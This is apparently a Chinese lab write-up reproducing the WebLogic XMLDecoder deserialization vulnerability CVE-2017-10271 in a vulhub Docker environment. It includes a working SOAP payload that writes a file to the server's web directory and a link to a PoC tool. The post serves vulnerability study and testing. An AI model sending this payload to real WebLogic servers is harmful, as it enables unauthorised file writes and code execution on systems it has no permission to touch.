Weblogic-Weblogic反序列化漏洞复现(CVE-2017-10271)

环境配置

1.安装docker

1.    curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo
2.    yum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpm
3.    yum install docker-ce
4.    systemctl start docker

2.更换镜像源

vi /etc/docker/daemon.json

修改文件内容,镜像源地址可以用阿里云的镜像地址,百度的中科大的163的镜像会有一个包下载很慢。自己登陆阿里云获取

{
        "registry-mirrors": ["https://xxxxx.mirrors.aliyun.com"]
}

保存退出之后,重新加载配置,重启docker

systemctl daemon-reload
systemctl restart docker

摘取镜像

docker pull busybox

成功打印出"hello world"说明配置成功

docker run busybox echo “hello world” 

到此docker配置完成

接下来部署实验环境

项目地址

https://github.com/vulhub/vulhub

下载后上传至任意目录,进入目录

vulhub-master/weblogic/CVE-2017-10271

启动docker编译

docker-compose up -d

这里如果没有命令环境的可以尝试

yum install -y python38
很多人pip装不上
wget https://bootstrap.pypa.io/get-pip.py
sudo  python3 get-pip.py
亲测有效
pip -version
pip install docker-compose

至此实验环境单间成功,查看端口是否映射成功

访问端口404说明安装成功

访问/wls-wsat/CoordinatorPortType,返回该界面则说明可能存在漏洞

修改请求数据包返回如下,注意请求包必须有下列两个参数

Upgrade-Insecure-Requests: 1
Content-Type:text/xml

payload如下

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>

提交请求后访问测试文件,访问成功
 

http://192.168.142.131:7001/wls-wsat/test.txt

相关poc工具链接:https://download.youkuaiyun.com/download/Litbai_zhang/12556456

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值